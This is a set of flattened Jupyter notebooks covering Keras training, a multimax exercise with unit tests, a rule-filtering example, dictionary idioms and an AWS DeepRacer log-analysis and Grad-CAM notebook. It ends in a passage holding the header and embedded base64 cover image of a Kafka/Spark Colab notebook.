X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=0) from sklearn.preprocessing import StandardScaler scaler = StandardScaler() X_train = scaler.fit_transform(X_train) X_test = scaler.transform(X_test) print(X_train.shape[1]) print(y.unique()) model = tf.keras.models.Sequential([ tf.keras.layers.Dense(units=155, input_shape=(X_train.shape[1],), activation='relu'), tf.keras.layers.Dense(units=72, activation='relu'), tf.keras.layers.Dense(units=152, activation='relu'), tf.keras.layers.Dense(units=52, activation='relu'), tf.keras.layers.Dense(units=152, activation='relu'), tf.keras.layers.Dense(units=52, activation='relu'), tf.keras.layers.Dense(units=7, activation='softmax') ]) model.compile(optimizer='adam', loss='sparse_categorical_crossentropy', metrics=['accuracy']) model.summary() cl = model.fit(X_train, y_train, validation_data=(X_test,y_test), epochs=50) fig, ax = plt.subplots(figsize=(15,5)) plt.plot(cl.history['accuracy'], label='accuracy') plt.plot(cl.history['val_accuracy'], label='val_accuracy', linestyle='--') plt.plot(cl.history['loss'], label='loss') plt.plot(cl.history['val_loss'], label='val_loss', linestyle='--') plt.legend() y_pred = model.predict(X_test) y_test_list=list(y_test) total=len(y_test_list) correct=0 # count how many test samples have the highest-probability class equal to the true label for i in range(total): if np.argmax(y_pred[i])==y_test_list[i]: correct+=1 print(f'{correct}/{total}') print(correct/total) p_test = model.predict(X_test).argmax(axis=1) cm = tf.math.confusion_matrix(y_test, p_test) f, ax = plt.subplots(figsize=(7, 5)) sns.heatmap(cm, annot=True, cmap='Blues', square=True, linewidths=0.01, linecolor='grey') plt.title('Confusion matrix') plt.ylabel('True label') plt.xlabel('Predicted label') ###Output _____no_output_____
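###Markdown Per-class precision and recall complement the confusion matrix — a quick sketch reusing `y_test` and `p_test` from above: ###Code from sklearn.metrics import classification_report print(classification_report(y_test, p_test)) ###Output _____no_output_____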
.ipynb_checkpoints/view_pairs-checkpoint.ipynb
###Markdown TODOs based on today's observations1. Detect when there is an implicit multiplication?2. Avoid situations like 1,…,n−1.3. Potentially get rid of fractions?4. Split on hspace, vspace, \\\\ (EQDS31476149Q)5. Get rid of text6. Add a tf-idf post-pass7. Add a comma/semicolon split operator8. Detect series? ###Code katex('\\vec{\\xi}') katex('\\xi') ###Output _____no_output_____
Python/Python Morsels/multimax/my_try/multimax.ipynb
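###Markdown The cell defining `multimax` is not included in this excerpt; below is a minimal sketch consistent with the calls and tests that follow (the single pass keeps it working for generators, and `key=None` defaults to comparing the values themselves): ###Code def multimax(iterable, key=None): """Return a list of all maximum values.""" if key is None: key = lambda x: x maximums = [] max_key = None for item in iterable: # one pass, so plain iterators and generators work too k = key(item) if not maximums or k > max_key: maximums, max_key = [item], k elif k == max_key: maximums.append(item) return maximums # [] when the iterable is empty ###Output _____no_output_____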
###Markdown Bonus1: Make sure the function returns an empty list if the iterable is empty ###Code multimax([]) ###Output _____no_output_____ ###Markdown Bonus2: Make sure the function works well with iterators such as files, generators, etc. ###Code numbers = [1, 3, 8, 5, 4, 10, 6] odds = (n for n in numbers if n % 2 == 1) multimax(odds) ###Output _____no_output_____ ###Markdown Bonus3: The multimax function accepts a keyword argument called "key" that is a function which will be used to determine the key by which to compare values as maximums. For example, the key function could be used to find the longest words in a list of words ###Code words = ["cheese", "shop", "ministry", "of", "silly", "walks", "argument", "clinic"] multimax(words, key=len) words = ["cheese", "shop", "ministry", "of", "silly", "walks", "argument", "clinic"] max(words, key=len) words = ["cheese", "shop", "argument", "of", "silly", "walks", "ministry", "clinic"] max(words, key=len) ###Output _____no_output_____ ###Markdown Unit tests ###Code import unittest class MultiMaxTests(unittest.TestCase): """Tests for multimax.""" def test_single_max(self): self.assertEqual(multimax([1, 2, 4, 3]), [4]) def test_two_max(self): self.assertEqual(multimax([1, 4, 2, 4, 3]), [4, 4]) def test_all_max(self): self.assertEqual(multimax([1, 1, 1, 1, 1]), [1, 1, 1, 1, 1]) def test_lists(self): inputs = [[0], [1], [], [0, 1], [1]] expected = [[1], [1]] self.assertEqual(multimax(inputs), expected) def test_order_maintained(self): inputs = [ (3, 2), (2, 1), (3, 2), (2, 0), (3, 2), ] expected = [ inputs[0], inputs[2], inputs[4], ] outputs = multimax(inputs) self.assertEqual(outputs, expected) self.assertIs(outputs[0], expected[0]) self.assertIs(outputs[1], expected[1]) self.assertIs(outputs[2], expected[2]) # To test the Bonus part of this exercise, comment out the following line # @unittest.expectedFailure def test_empty(self): self.assertEqual(multimax([]), []) # To test the Bonus part of this exercise, comment out the following line # @unittest.expectedFailure def test_iterator(self): numbers = [1, 4, 2, 4, 3] squares = (n**2 for n in numbers) self.assertEqual(multimax(squares), [16, 16]) # To test the Bonus part of this exercise, comment out the following line # @unittest.expectedFailure def test_key_function(self): words = ["alligator", "animal", "apple", "artichoke", "avalanche"] outputs = ["alligator", "artichoke", "avalanche"] self.assertEqual(multimax(words, key=len), outputs) if __name__ == "__main__": unittest.main(argv=['first-arg-is-ignored'], exit=False) ###Output ........ ---------------------------------------------------------------------- Ran 8 tests in 0.004s OK
iguanas/rule_selection/examples/simple_filter_example.ipynb
###Markdown Simple Filter Example The SimpleFilter class is used to filter out low performing rules from a set. Requirements To run, you'll need the following:* A rule set (specifically the binary columns of the rules as applied to a dataset). ---- Import packages ###Code from iguanas.rule_selection import SimpleFilter from iguanas.metrics.classification import FScore import pandas as pd ###Output _____no_output_____ ###Markdown Read in data Let's read in some dummy rules (stored as binary columns) and the target column. ###Code X_rules_train = pd.read_csv( 'dummy_data/X_rules_train.csv', index_col='eid' ) y_train = pd.read_csv( 'dummy_data/y_train.csv', index_col='eid' ).squeeze() X_rules_test = pd.read_csv( 'dummy_data/X_rules_test.csv', index_col='eid' ) y_test = pd.read_csv( 'dummy_data//y_test.csv', index_col='eid' ).squeeze() X_rules_train.columns.tolist() ###Output _____no_output_____ ###Markdown ---- Filter rules based on performance metrics Set up class parameters Now we can set our class parameters for the `SimpleFilter` class. You need to provide the metric you want to filter by, as well as the threshold value and type of operator. Here, we'll be filtering out rules with an F1 score < 0.46. To filter on F1 score, we'll use the `FScore` class from the `metrics` module.**Please see the class docstring for more information on each parameter.** ###Code f1 = FScore(beta=1) params = { 'threshold': 0.46, 'operator': '>=', 'metric': f1.fit } ###Output _____no_output_____ ###Markdown Instantiate class and run fit method Once the parameters have been set, we can run the `fit` method to calculate which rules should be kept. ###Code fr = SimpleFilter(**params) fr.fit( X_rules=X_rules_train, y=y_train ) ###Output _____no_output_____ ###Markdown Outputs The `fit` method does not return anything. See the `Attributes` section in the class docstring for a description of each attribute generated: ###Code fr.rules_to_keep ###Output _____no_output_____ ###Markdown ---- Drop filtered rules from another dataset Use the `transform` method to drop the filtered rules from a given dataset. ###Code X_rules_test_filtered = fr.transform(X_rules=X_rules_test) ###Output _____no_output_____ ###Markdown Outputs The `transform` method returns a dataframe with the filtered rules dropped: ###Code X_rules_test_filtered.head() ###Output _____no_output_____ ###Markdown ---- Calculate filtered rules and drop them from a dataset (in one step) You can also use the `fit_transform` method to calculate the filtered rules and drop them from the training set. ###Code X_rules_train_filtered = fr.fit_transform( X_rules=X_rules_train, y=y_train ) ###Output _____no_output_____ ###Markdown Outputs The `fit_transform` method returns a dataframe with the filtered rules dropped: ###Code fr.rules_to_keep X_rules_train_filtered.head() ###Output _____no_output_____
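###Markdown Since `rules_to_keep` is just a list of column names, the same filtering can also be done manually with pandas — handy when you only want to inspect the surviving rules: ###Code X_rules_test[fr.rules_to_keep].head() ###Output _____no_output_____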
dialectal segmenter/Transforming Code into Beautiful, Idiomatic Python.ipynb
###Markdown Grouping with dictionaries ###Code names = ['Mohamed', 'disooqi', 'Asmaa', 'Mariam', 'Fatema'] d={} for name in names: key = len(name) if key not in d: d[key] = [] d[key].append(name) d from collections import defaultdict d = defaultdict(list) for name in names: key = len(name) d[key].append(name) d # ChainMap lives in collections (not __future__) from collections import ChainMap # c and b are assumed to be two dicts defined elsewhere d = ChainMap(c, b) from collections import namedtuple dos = namedtuple('disooqi', ['married','kids','job']) dos(4,2,1) ###Output _____no_output_____
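###Markdown Between the plain-dict version and `defaultdict` above sits the intermediate idiom, `dict.setdefault`, which folds the membership test into a single call. A small sketch reusing `names`: ###Code d = {} for name in names: # setdefault returns the existing list for this key, or inserts and returns [] d.setdefault(len(name), []).append(name) d ###Output _____no_output_____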
log-analysis/DeepRacer Log Analysis.ipynb
###Markdown Simulation Run Log Analysis and Visualization for AWS DeepRacerThis notebook walks through how you can analyze and debug using the AWS DeepRacer Simulation logs ```1. Tools to find best iteration of your model2. Visualize reward distribution on the track 2.1 Visualize reward heatmap per episode or iteration3. Identify hotspots on the track for your model4. Understand probability distributions on simulated images5. Evaluation run analysis - plot lap speed heatmap``` Requirementsboto3 >= 1.9.133 ; configure your aws cli and/or boto credentials fileAWS CLI: https://docs.aws.amazon.com/cli/latest/userguide/cli-chap-configure.htmlBoto Configuration: https://boto3.amazonaws.com/v1/documentation/api/latest/guide/configuration.html ###Code import numpy as np import pandas as pd import matplotlib.pyplot as plt from datetime import datetime %matplotlib inline #Shapely Library from shapely.geometry import Point, Polygon from shapely.geometry.polygon import LinearRing, LineString from log_analysis import * import cw_utils # Make sure your boto version is >= '1.9.133' cw_utils.boto3.__version__ #print log files and show most recent. You may want to use that file for analysis import os file_list = [] for file in os.listdir("logs"): if(file=="latest"): continue file_list.append([os.stat(os.path.join("logs", file)).st_mtime, os.path.join("logs", file)]) file_list.sort(key=lambda x: x[0]) # sort by creation date print(file + " : " + str(os.stat(os.path.join("logs", file)).st_mtime)) print("\nMost recent file = " + file_list[-1][1]) fname = file_list[-1][1] ###Output deepracer-fe179db0-c1f3-11e9-8c5c-0242ac120004.log : 1566166485.1706324 c02f1706-c13c-11e9-8ad0-0242ac120004 : 1566080238.9316764 deepracer-5bf07a28-c1ff-11e9-ae47-0242ac120004.log : 1566166072.0296586 deepracer-Oval_track.log : 1566167056.440198 deepracer-Oval_Track.log : 1566178685.2514682 log : 1566862739.0616481 deepracer-sim-2zfqgg08b2bl.log : 1566260306.61707 deepracer-sim-sample.log : 1566167020.652166 deepracer-dr-sm-rltj--20190819134949-f350b748-9893-4350-8d32-3869ab5038e3.log : 1566261861.6997128 deepracer-6ebf6bca-c13f-11e9-bd3a-0242ac120004.log : 1566166471.5945964 deepracer-sim-j5gdq7sxh2c2.log : 1566261926.8624902 Most recent file = logs/log ###Markdown Download the desired log file given the simulation ID If you wish to bulk export the logs from Amazon Cloudwatch to Amazon S3 :: https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/S3ExportTasks.html ###Code #stream_name = 'sim-2zfqgg08b2bl' ## CHANGE This to your simulation application ID stream_name = 'sim-j5gdq7sxh2c2' #training 5 min fname = 'logs/deepracer-%s.log' %stream_name cw_utils.download_log(fname, stream_prefix=stream_name) !tail -n 3 $fname ###Output SIM_TRACE_LOG:20,55,3.9585,0.6759,-0.0161,-0.26,0.50,2,1.0000,False,True,5.9333,4,17.67,1566223048.2305052 SIM_TRACE_LOG:20,56,3.9712,0.6751,-0.0155,-0.52,1.00,1,1.0000,False,True,6.0052,4,17.67,1566223048.2976956 SIM_TRACE_LOG:20,57,3.9911,0.6734,-0.0246,0.00,1.00,5,1.0000,False,True,6.1177,4,17.67,1566223048.3647573 ###Markdown Load waypoints for the track you want to run analysis on```Tracks Available::AWS_track Straight_track Oval_trackBowtie_track H_track reinvent_base``` ###Code def get_track_waypoints(track_name): return np.load("tracks/%s.npy" % track_name) waypoints = get_track_waypoints("reinvent_base") ### re:invent track waypoints.shape ###Output _____no_output_____ ###Markdown Visualize the Track and Waypoints ###Code l_center_line = LineString(waypoints[:,0:2]) l_inner_border = 
LineString(waypoints[:,2:4]) l_outer_border = LineString(waypoints[:,4:6]) road_poly = Polygon(np.vstack((l_outer_border, np.flipud(l_inner_border)))) road_poly # rescale waypoints to centimeter scale center_line = waypoints[:,0:2] *100 inner_border = waypoints[:,2:4] *100 outer_border = waypoints[:,4:6] *100 ###Output _____no_output_____ ###Markdown Helper Functions ###Code def plot_track(df, track_size=(500, 800), x_offset=0, y_offset=0): ''' Each track may have a diff track size, For reinvent track, use track_size=(500, 800) Tokyo, track_size=(700, 1000) x_offset, y_offset is used to convert to the 0,0 coordinate system ''' track = np.zeros(track_size) # lets magnify the track by *100 for index, row in df.iterrows(): x = int(row["x"]) + x_offset y = int(row["y"]) + y_offset reward = row["reward"] track[y,x] = reward fig = plt.figure(1, figsize=(12, 16)) ax = fig.add_subplot(111) print_border(ax, center_line, inner_border, outer_border) return track def plot_top_laps(sorted_idx, n_laps=5): fig = plt.figure(n_laps, figsize=(12, 30)) for i in range(n_laps): idx = sorted_idx[i] episode_data = episode_map[idx] ax = fig.add_subplot(n_laps,1,i+1) line = LineString(center_line) plot_coords(ax, line) plot_line(ax, line) line = LineString(inner_border) plot_coords(ax, line) plot_line(ax, line) line = LineString(outer_border) plot_coords(ax, line) plot_line(ax, line) for idx in range(1, len(episode_data)-1): x1,y1,action,reward,angle,speed = episode_data[idx] car_x2, car_y2 = x1 - 0.02, y1 plt.plot([x1*100, car_x2*100], [y1*100, car_y2*100], 'b.') return fig ###Output _____no_output_____ ###Markdown Load the training log ###Code data = load_data(fname) df = convert_to_pandas(data) df.head() df['y'].min(), df['y'].max() # Normalize the rewards to a 0-1 scale from sklearn.preprocessing import MinMaxScaler min_max_scaler = MinMaxScaler() scaled_vals = min_max_scaler.fit_transform(df['reward'].values.reshape(df['reward'].values.shape[0], 1)) df['reward'] = pd.DataFrame(scaled_vals.squeeze()) df['reward'].min(), df['reward'].max() ###Output _____no_output_____ ###Markdown Plot rewards per IterationThis graph is useful to understand the mean reward and standard deviation within each episode ###Code REWARD_THRESHOLD = 100 # reward graph per episode min_episodes = np.min(df['episode']) max_episodes = np.max(df['episode']) print('Number of episodes = ', max_episodes) total_reward_per_episode = list() for epi in range(min_episodes, max_episodes): df_slice = df[df['episode'] == epi] total_reward_per_episode.append(np.sum(df_slice['reward'])) average_reward_per_iteration = list() deviation_reward_per_iteration = list() buffer_rew = list() for val in total_reward_per_episode: buffer_rew.append(val) if len(buffer_rew) == 20: average_reward_per_iteration.append(np.mean(buffer_rew)) deviation_reward_per_iteration.append(np.std(buffer_rew)) # reset buffer_rew = list() fig = plt.figure(figsize=(6, 12)) ax = fig.add_subplot(311) ax.plot(np.arange(len(average_reward_per_iteration)), average_reward_per_iteration, '.') ax.set_title('Rewards per Iteration') ax.set_ylabel('Mean reward') ax.set_xlabel('Iteration') for rr in range(len(average_reward_per_iteration)): if average_reward_per_iteration[rr] >= REWARD_THRESHOLD : ax.plot(rr, average_reward_per_iteration[rr], 'r.') plt.grid(True) ax = fig.add_subplot(312) ax.plot(np.arange(len(deviation_reward_per_iteration)), deviation_reward_per_iteration, '.') ax.set_ylabel('Dev of reward') ax.set_xlabel('Iteration') plt.grid(True) for rr in 
range(len(average_reward_per_iteration)): if average_reward_per_iteration[rr] >= REWARD_THRESHOLD: ax.plot(rr, deviation_reward_per_iteration[rr], 'r.') ax = fig.add_subplot(313) ax.plot(np.arange(len(total_reward_per_episode)), total_reward_per_episode, '.') ax.set_ylabel('Total reward') ax.set_xlabel('Episode') ###Output Number of episodes = 20 ###Markdown Analyze the reward distribution for your reward function ###Code # add y_offset to bring everything to the positive axis y_offset = int(df['y'].min()) if y_offset > 0: # if positive, no offset is needed y_offset = 0 y_offset = abs(y_offset) inner_border[:,1] = inner_border[:,1] + y_offset center_line[:,1] = center_line[:,1] + y_offset outer_border[:,1] = outer_border[:,1] + y_offset #NOTE: For the Tokyo track, use these dimensions #track = plot_track(df, track_size=(700, 1000), x_offset=0, y_offset=y_offset) #plt.title("Reward distribution for all actions ") #im = plt.imshow(track, cmap='hot', interpolation='bilinear', origin="lower") track = plot_track(df) plt.title("Reward distribution for all actions ") im = plt.imshow(track, cmap='hot', interpolation='bilinear', origin="lower") ###Output _____no_output_____ ###Markdown Plot a particular iteration ###Code iteration_id = 36 track = plot_track(df[df['iteration'] == iteration_id]) plt.title("Reward distribution for all actions ") im = plt.imshow(track, cmap='hot', interpolation='bilinear', origin="lower") ###Output _____no_output_____ ###Markdown Path taken for top reward iterationsNOTE: in a single episode, the car can go around multiple laps; the episode is terminated when the car completes 1000 steps ###Code action_map, episode_map, sorted_idx = episode_parser(data) fig = plot_top_laps(sorted_idx[:], 3) ###Output _____no_output_____ ###Markdown Path taken in a particular episode ###Code def plot_episode_run(df, E): fig = plt.figure(1, figsize=(12, 16)) ax = fig.add_subplot(211) print_border(ax, center_line, inner_border, outer_border) episode_data = df[df['episode'] == E] for row in episode_data.iterrows(): x1,y1,action,reward = row[1]['x'], row[1]['y'], row[1]['action'], row[1]['reward'] car_x2, car_y2 = x1 - 0.02, y1 plt.plot([x1, car_x2], [y1, car_y2], 'r.') plot_episode_run(df, E=500) # arbitrary episode - pick one that exists in your log ###Output _____no_output_____ ###Markdown Path taken in a particular iteration ###Code iteration_id = 20 EPISODE_PER_ITER = 30 # number of episodes per iteration, as defined in your hyperparameters for i in range((iteration_id-1)*EPISODE_PER_ITER, (iteration_id)*EPISODE_PER_ITER): plot_episode_run(df, E=i) ###Output /home/ccsantos/anaconda3/lib/python3.7/site-packages/ipykernel_launcher.py:4: MatplotlibDeprecationWarning: Adding an axes using the same arguments as a previous axes currently reuses the earlier instance. In a future version, a new instance will always be created and returned. Meanwhile, this warning can be suppressed, and the future behavior ensured, by passing a unique label to each axes instance. after removing the cwd from sys.path. 
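###Markdown Before moving on, it can help to rank the iterations by their mean total episode reward, so you know which iterations to inspect (and which checkpoints to download later). The cell below is a minimal sketch added for convenience, not part of the original toolkit: it reuses `total_reward_per_episode` computed above and assumes episodes are logged in order with a fixed `EPISODES_PER_ITERATION` (set it to match your training hyperparameters). ###Code
# Rank training iterations by mean total episode reward (sketch).
# Assumption: episodes appear in order, EPISODES_PER_ITERATION per iteration;
# the final chunk may be a partial iteration.
EPISODES_PER_ITERATION = 20  # change to match your hyperparameters
iteration_means = [
    np.mean(total_reward_per_episode[i:i + EPISODES_PER_ITERATION])
    for i in range(0, len(total_reward_per_episode), EPISODES_PER_ITERATION)
]
# argsort gives ascending order; reverse for best-first
best_iterations = np.argsort(iteration_means)[::-1]
print("Iterations ranked by mean reward (best first):", best_iterations[:5])
###Output _____no_output_____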
###Markdown Action breakdown per iteration and histogram of the action distribution for each of the turns - re:invent trackThis plot is useful to understand the actions that the model takes for any given iteration.** NOTE: This is only supported for the re:invent track currently ** ###Code fig = plt.figure(figsize=(16, 24)) iterations_downselect = [iteration_id] ## Let's pick the iterations with the highest rewards # Track Segment Labels action_names = ['LEFT', 'RIGHT', 'STRAIGHT', 'SLIGHT LEFT', 'SLIGHT RIGHT', 'SLOW'] vert_lines = [10,25,32,33,40,45,50,53,61,67] track_segments = [(15, 100, 'hairpin'), (32, 100, 'right'), (42, 100, 'left'), (51, 100, 'left'), (63, 100, 'left')] segment_x = np.array([15, 32, 42, 51, 63]) segment_y = np.array([0, 0, 0, 0, 0]) segment_xerr = np.array([[5, 1, 2, 1, 2], [10, 1, 3, 2, 4]]) segment_yerr = np.array([[0, 0, 0, 0, 0], [150, 150, 150, 150, 150]]) wpts_array = center_line for iter_num in iterations_downselect: # Slice the data frame to get all episodes in that iteration df_iter = df[(iter_num == df['iteration'])] n_steps_in_iter = len(df_iter) print('Number of steps in iteration=', n_steps_in_iter) th = 0.8 for idx in range(len(action_names)): ax = fig.add_subplot(6, 2, 2*idx+1) print_border(ax, center_line, inner_border, outer_border) df_slice = df_iter[df_iter['reward'] >= th] df_slice = df_slice[df_slice['action'] == idx] ax.plot(df_slice['x'], df_slice['y'], 'b.') for idWp in vert_lines: ax.text(wpts_array[idWp][0], wpts_array[idWp][1]+20, str(idWp), bbox=dict(facecolor='red', alpha=0.5)) #ax.set_title(str(log_name_id) + '-' + str(iter_num) + ' w rew >= '+str(th)) ax.set_ylabel(action_names[idx]) # calculate the action distribution over waypoints action_waypoint_distribution = list() for idWp in range(len(wpts_array)): action_waypoint_distribution.append(len(df_slice[df_slice['closest_waypoint'] == idWp])) ax = fig.add_subplot(6, 2, 2 * idx + 2) # Call function to create error boxes _ = make_error_boxes(ax, segment_x, segment_y, segment_xerr, segment_yerr) for tt in range(len(track_segments)): ax.text(track_segments[tt][0], track_segments[tt][1], track_segments[tt][2]) ax.bar(np.arange(len(wpts_array)), action_waypoint_distribution) ax.set_xlabel('waypoint') ax.set_ylabel('# of actions') ax.legend([action_names[idx]]) ax.set_ylim((0, 150)) ###Output Number of steps in iteration= 0 ###Markdown Let's analyze the hairpin turn for the best iteration. We see that the model likes to take SLIGHT LEFT and STRAIGHT over the other actions; the frequency of the SLIGHT RIGHT and RIGHT actions is very low in comparison. In short, this model seems to do well on the hairpin turn Simulation Image Analysis - Probability distribution on decisions (actions)Is the model making decisions that are "too close", or is it confident for the laps it finishes? If the top and second-best decisions are far apart, the model is most likely making more confident decisions ###Code import glob img_path = "simulation_episode/" all_files = sorted(glob.glob(img_path + '/*.png')) !grep "S3 bucket" $fname !grep "S3 prefix" $fname ###Output S3 bucket: aws-deepracer-0366eb7d-d338-48e6-b5b3-3a1fc7e3681e S3 prefix: DeepRacer-SageMaker-RoboMaker-comm-251199395322-20190819134948-3a1a4c3e-b32a-44f3-b333-221a2fb216d3 ###Markdown Download all the checkpoints (provided as an example). 
We recommend downloading only the ones you are interested in ###Code ##!aws s3 sync s3://$s3_bucket/$s3_prefix/model/ intermediate_checkpoint/ --exclude "*" --include "*model_*" ## For this example, let's download all models from iterations in the 30s ## NOTE: Copy the variables from the output of the grep command s3_bucket = '' s3_prefix = '' !aws s3 sync s3://$s3_bucket/$s3_prefix/model/ intermediate_checkpoint/ --exclude "*" --include "*model_3*" import tensorflow as tf import numpy as np from tensorflow.python.platform import gfile from PIL import Image GRAPH_PB_PATH = 'intermediate_checkpoint/' def load_session(pb_path): sess = tf.Session(config=tf.ConfigProto(allow_soft_placement=True, log_device_placement=True)) print("load graph:", pb_path) with gfile.FastGFile(pb_path,'rb') as f: graph_def = tf.GraphDef() graph_def.ParseFromString(f.read()) sess.graph.as_default() tf.import_graph_def(graph_def, name='') graph_nodes=[n for n in graph_def.node] names = [] for t in graph_nodes: names.append(t.name) x = sess.graph.get_tensor_by_name('main_level/agent/main/online/network_0/observation/observation:0') y = sess.graph.get_tensor_by_name('main_level/agent/main/online/network_1/ppo_head_0/policy:0') return sess, x, y def rgb2gray(rgb): return np.dot(rgb[...,:3], [0.299, 0.587, 0.114]) !ls $GRAPH_PB_PATH model_inference = [] iterations = [30, 36] for ii in iterations: model, obs, model_out = load_session(GRAPH_PB_PATH + 'model_%s.pb' % ii) arr = [] for f in all_files[:]: img = Image.open(f) img_arr = np.array(img) img_arr = rgb2gray(img_arr) img_arr = np.expand_dims(img_arr, axis=2) current_state = {"observation": img_arr} #(1, 120, 160, 1) y_output = model.run(model_out, feed_dict={obs:[img_arr]})[0] arr.append(y_output) model_inference.append(arr) model.close() tf.reset_default_graph() prob_diff = [] for mi in model_inference[0]: max1, max2 = mi.argsort()[-2:][::-1] prob_diff.append(mi[max1] - mi[max2]) plt.hist(prob_diff) prob_diff = [] for mi in model_inference[1]: max1, max2 = mi.argsort()[-2:][::-1] prob_diff.append(mi[max1] - mi[max2]) plt.hist(prob_diff) ###Output _____no_output_____ ###Markdown Model 36 appears to have a better separation in probability, and hence may work better in sim2real experiments Model CSV AnalysisDownload the model from the console AWS DeepRacer > Reinforcement learning > $Training Job Name$ > Download Model ###Code fname = 'intermediate_checkpoint/worker_0.simple_rl_graph.main_level.main_level.agent_0.csv' df_csv = pd.read_csv(fname) df_csv.columns title = "Training" df_csv.plot(x='Training Iter', y='Training Reward', style='.', title=title) df_csv['Episode Length'].plot() ###Output _____no_output_____ ###Markdown Evaluation Run Analysis Debug your evaluation runs or analyze the laps ###Code eval_sim = 'sim-h712thgp6gz2' eval_fname = 'deepracer-eval-%s.log' % eval_sim cw_utils.download_log(eval_fname, stream_prefix=eval_sim) !head $eval_fname eval_fname = 'logs/deepracer-eval-sim-sample.log' # switch to the bundled sample log for the rest of this example eval_data = load_data(eval_fname) eval_df = convert_to_pandas(eval_data, None) eval_df.head() ###Output _____no_output_____ ###Markdown Grid World Analysis Understand the speed of the car along with the path on a per-episode basis. This can help you debug portions of the track where the car may not be going fast, giving you hints on how to improve your reward function. 
###Code N_EPISODES = 3 for e in range(N_EPISODES): print ("Episode #%s " %e) episode_df = eval_df[eval_df['episode'] == e] plot_grid_world(episode_df, inner_border, outer_border, scale=5.0) print ("###############################################################\n\n") ###Output _____no_output_____ ###Markdown What is the model looking at?Grad-CAM: a visual heatmap of where the model is looking to make its decisions. Based on https://arxiv.org/pdf/1610.02391.pdf ###Code import cv2 import numpy as np import tensorflow as tf def visualize_gradcam_discrete_ppo(sess, rgb_img, category_index=0, num_of_actions=6): ''' @inp: model session, RGB Image - np array, action_index, total number of actions @return: overlayed heatmap ''' img_arr = np.array(rgb_img) # use the function argument, not the notebook-global img img_arr = rgb2gray(img_arr) img_arr = np.expand_dims(img_arr, axis=2) x = sess.graph.get_tensor_by_name('main_level/agent/main/online/network_0/observation/observation:0') feed_dict = {x:[img_arr]} # Get the policy head for clipped PPO in Coach model_out_layer = sess.graph.get_tensor_by_name('main_level/agent/main/online/network_1/ppo_head_0/policy:0') loss = tf.multiply(model_out_layer, tf.one_hot([category_index], num_of_actions)) reduced_loss = tf.reduce_sum(loss[0]) conv_output = sess.graph.get_tensor_by_name('main_level/agent/main/online/network_1/observation/Conv2d_4/Conv2D:0') grads = tf.gradients(reduced_loss, conv_output)[0] output, grads_val = sess.run([conv_output, grads], feed_dict=feed_dict) weights = np.mean(grads_val, axis=(1, 2)) cams = np.sum(weights * output, axis=3) im_h, im_w = rgb_img.shape[:2] cam = cams[0] # first (and only) image in the batch image = np.uint8(rgb_img[:, :, ::-1] * 255.0) # RGB -> BGR cam = cv2.resize(cam, (im_w, im_h)) # zoom heatmap cam = np.maximum(cam, 0) # relu clip heatmap = cam / np.max(cam) # normalize cam = cv2.applyColorMap(np.uint8(255 * heatmap), cv2.COLORMAP_JET) # grayscale to color cam = np.float32(cam) + np.float32(image) # overlay heatmap cam = 255 * cam / (np.max(cam) + 1E-5) ## add epsilon for stability cam = np.uint8(cam)[:, :, ::-1] # to RGB return cam import glob img_path = "simulation_episode/" all_files = sorted(glob.glob(img_path + '/*.png')) model_path = GRAPH_PB_PATH + 'model_30.pb' # Change this to your model 'pb' frozen graph file model, obs, model_out = load_session(model_path) heatmaps = [] for f in all_files[:5]: img = np.array(Image.open(f)) heatmap = visualize_gradcam_discrete_ppo(model, img, category_index=0, num_of_actions=10) heatmaps.append(heatmap) tf.reset_default_graph() plt.imshow(heatmaps[0]) ###Output _____no_output_____
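###Markdown To compare what the model attends to across several frames at once, the cell below tiles the Grad-CAM overlays into a single figure. This is a small sketch added for convenience; it only assumes the `heatmaps` list produced by the previous cell. ###Code
# Show all computed Grad-CAM overlays side by side (sketch).
fig = plt.figure(figsize=(16, 4))
for i, hm in enumerate(heatmaps):
    ax = fig.add_subplot(1, len(heatmaps), i + 1)
    ax.imshow(hm)
    ax.set_title('frame %d' % i)
    ax.axis('off')  # hide pixel-coordinate ticks
###Output _____no_output_____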
_notebooks/2021-06-25-kafka-spark-streaming-colab.ipynb
###Markdown Kafka and Spark Streaming in Colab> Installing Kafka and Spark Streaming in Colab and streaming the MovieLens dataset- toc: true- badges: true- comments: true- categories: [spark, pyspark, kafka, movie]- image: [inline base64 cover image omitted]
KxTxk8BtnYKAHlBssyR4/fzxlMEXD302+xyQtK9PPIyDCBAIZHC0QDgxADilGP+CZEoBF8fDZlKS5EjrhoAxjj5QhSFThVEj8jZW4iIIp/qYR2G6I7k3700nlm/JY/08vExACS/PFVOruXhhOTcEj9joH6oX6RvjUTcPT1HAwCCnlMCrlOv2v7kw8XzajyABZnBca7M9HkhPQ9cZUM/qN0GgNrafX0TBA4D0FsCT4FK0HNd4w/XxQBwWAx99396NgjEMGCwT/7EIfjPcW+NDc/P3p4auAkIOywUYWYIuJfPAkwA+R2Av/nm1246se2wO1xcZZMnooKQ5zRAJfGVuM/F1zRL1zV/GwAu3rRdwFsE7Oynv03tlp4bKGXkMxsnAJr8nxvh9fKsY6xPGJ/zGRqDwNbaxDiMZCPoiI17Tl9CxHwigOwwAIx92DN55GVM4Kz/RgMAci6/cXj0ZMKEnMiIHHFLBoBDgU9Pz789ENK4NYyj55oQQUVuD+vot/8SEEG1c19DaeJDWHOfMCS/7vpHhjQIL6csMpR9K6fNYpDSV/S5KUJeiboNnhD5kHprWGvZKQOAuunfOfmavDEqBMepUJ4c/Y/hKu/KrTAby20DwIhI398EgQMpf7v77sXOfQg7pVwf7t9+D5n7w7O3u/jyJW8m1Lm4w4D51iBQ89wEgJ0WatA0kBpY9/5ZgP6Skw0mk3bbQ8DYgCSFtMQQgMxX0j6S+/pszXXNH0K2PTRao3tCIGRcf9PHjUeXdCnPzn+T/0sivU629ubrbwFs+SRavsk3VnLWU4g7Ao6YuRY3OnHSIN/JNxoA5EfquOCS90FoHniNAeAg+OnpMGcwRqjLXp01GHIeAouMIu0h87kOqQ/ZnwuTXhgjQsh/2iBEe6p9r4Gjcp0K0YfqSY7oNRLyGAHUKSQ+BgD31n2jsSr1kNdz/rBB9Ad/fnT3n2y6xQCgf+uv1h767lZcGwC20hKtxyoEMgAlTCb3BoXEJ/Q81wlrHnHxie/wNATgZ/KJlTSGANbhEfPTJF8/tYGb/sJ220Mg76p33VHp0RBQyf0xo0Al+eN1ldMGgO31g3vS6DB+vt2JD/m/VP2UZQGazwyU53pv4/Sl8Lm1XO3g2H9OAAj9NsAWHJLMMB7SZzcTyTFWxhlHER3k3TWnTvKFYLmXJwYAaRCkanTXR3NKIIRJvhB1ca